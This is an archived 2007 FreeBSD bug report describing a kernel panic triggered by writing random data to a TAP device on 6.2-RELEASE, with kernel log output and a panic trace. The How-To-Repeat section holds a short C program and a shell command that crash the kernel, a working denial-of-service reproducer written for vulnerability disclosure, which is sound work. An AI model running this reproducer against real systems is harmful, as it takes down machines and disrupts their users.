Date: Mon, 3 Dec 2007 15:08:13 GMT From: Gabor Berczi <gabor@berczi.be> To: freebsd-gnats-submit@FreeBSD.org Subject: misc/118399: local/remote kernel DoS through TAP device Message-ID: <200712031508.lB3F8DVQ080758@www.freebsd.org> Resent-Message-ID: <200712031510.lB3FA4Tg071116@freefall.freebsd.org>
next in thread | raw e-mail | index | archive | help
>Number: 118399 >Category: misc >Synopsis: local/remote kernel DoS through TAP device >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Dec 03 15:10:04 UTC 2007 >Closed-Date: >Last-Modified: >Originator: Gabor Berczi >Release: 6.2-RELEASE >Organization: >Environment: Tested on x86/alpha, SMP/non-SMP. >Description: There is a bug somewhere in the FreeBSD kernel that causes lockup if the TAP device receives abnormal data. .. tap1: discard oversize frame (ether type 4f84 flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 0 flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 39e7 flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 0 flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 4fe7 flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 44b4 flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 87df flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 1c flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 1f flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 80c0 flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 9a87 flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type c5e6 flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 2aab flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 656c flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type e6f3 flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 48bd flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 0 flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type ca87 flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type d0ca flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 249c flags 3 len 16384 > max 1514) tap1: discard oversize frame (ether type 0 flags 3 len 16384 > max 1514) fatal kernel trap: trap entry = 0x2 (memory management fault) cpuid = 0 faulting va = 0x34 type = access violation cause = load instructon pc = 0xfffffc00005dd39c ra = 0xfffffc00005de15c sp = 0xfffffe0007763870 usp = 0x11ffd6c0 curthread = 0xfffffc0001ef22b0 pid = 31183, comm = zsh panic: trap >How-To-Repeat: 1. Compile this: #include <fcntl.h> #include <stdio.h> #include <sys/types.h> #include <sys/uio.h> #include <unistd.h> int main(int argc, char **argv) { if (argc != 2) return 1; int fd = open(argv[1], O_WRONLY); if (fd < 0) { perror("open"); return 1; } for (;;) { char buf[2048]; int ret = read(0, buf, sizeof(buf)); if (ret < 0) { perror("read"); close(fd); return 1; } ret = write(fd, buf, ret); } return 0; } 2. Load if_tap, and create tap0 device. 3. cat /dev/urandom|./a.out /dev/tap0 Sooner or later it'll die. >Fix: >Release-Note: >Audit-Trail: >Unformatted:
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?200712031508.lB3F8DVQ080758>